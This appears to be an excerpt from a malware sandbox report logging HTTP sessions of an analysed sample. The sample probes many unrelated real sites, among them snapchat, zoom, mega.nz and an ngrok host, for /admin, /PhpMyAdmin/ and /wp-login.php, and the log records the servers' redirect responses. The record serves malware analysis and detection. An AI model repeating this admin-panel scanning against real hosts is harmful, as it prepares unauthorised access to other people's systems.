                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.620270014 CET1280INData Raw: b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: [Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@IwxzZ}e
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.620280027 CET324INData Raw: 27 27 d1 a0 53 0f 82 9e cf 87 a7 8e 0c ec 49 e1 1a fb 01 24 c7 95 eb cb 7b ed c7 86 98 a3 0b a2 ca 42 8a 29 83 13 95 98 e1 70 1a 36 f6 21 70 7f 53 27 0a c4 36 66 04 b5 80 13 0f 72 7a 91 30 ac ac 7a 4e 53 54 9c c5 ce e4 a6 bc 14 6d 40 a8 c0 46 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T:d2v
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.620290041 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.625402927 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.833462954 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=68F91CB36893B7EB62E3CE0CD37C2F12:FG=1; expires=Tue, 04-Feb-25 11:16:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTcES3b+qnFLvvIASADwtAFKxCqAkOm5
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.986901045 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                482192.168.2.66520234.149.46.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.575484037 CET176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.677953959 CET205INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                483192.168.2.665207195.85.23.9580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.589904070 CET171OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.838881969 CET1226INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; path=/; domain=.bongacams.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/admin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded6941-web19
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: fv=ZQp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; path=/; expires=Mon, 05-Feb-24 11:46:10 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e8b0badd1-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 72 6f 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 65<html><head><meta http-equiv="refresh" content="0;url=https://ro.bongacams.com/admin"/></head></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.838897943 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                484192.168.2.6652083.134.125.17580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.145489931 CET190OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.269541979 CET328INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 12a629b6607b6c0a3e4b72ee0c1a5da5
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/PhpMyAdmin/">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                485192.168.2.665214138.197.59.19980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.145543098 CET184OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.267512083 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                486192.168.2.66524145.60.0.4480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.145649910 CET176OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.408241034 CET961INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; expires=Tue, 04 Feb 2025 10:21:10 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNub; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 32-27694274-27694371 NNNY CT(118 -1 0) RT(1707131770438 501) q(0 0 0 36) r(1 1) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/PhpMyAdmin/">here</a></body>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                487192.168.2.6652333.141.96.5380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.145704985 CET175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.270936966 CET150INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                488192.168.2.665247170.114.52.280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.145749092 CET174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.294595957 CET1000INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ePPGSeqn1uGJdtXKQNOi7OTqszjWzio0E9NryE7yoRE%2F59mUuCRnrdjxiBBQTDJajllpmjIVucj3scg93Wx9jvHA4zFhAjQPk57amx573tXzWrDivqPNhcHEjkAGuME%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd61fa8253e7-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                489192.168.2.66520631.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.146287918 CET166OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
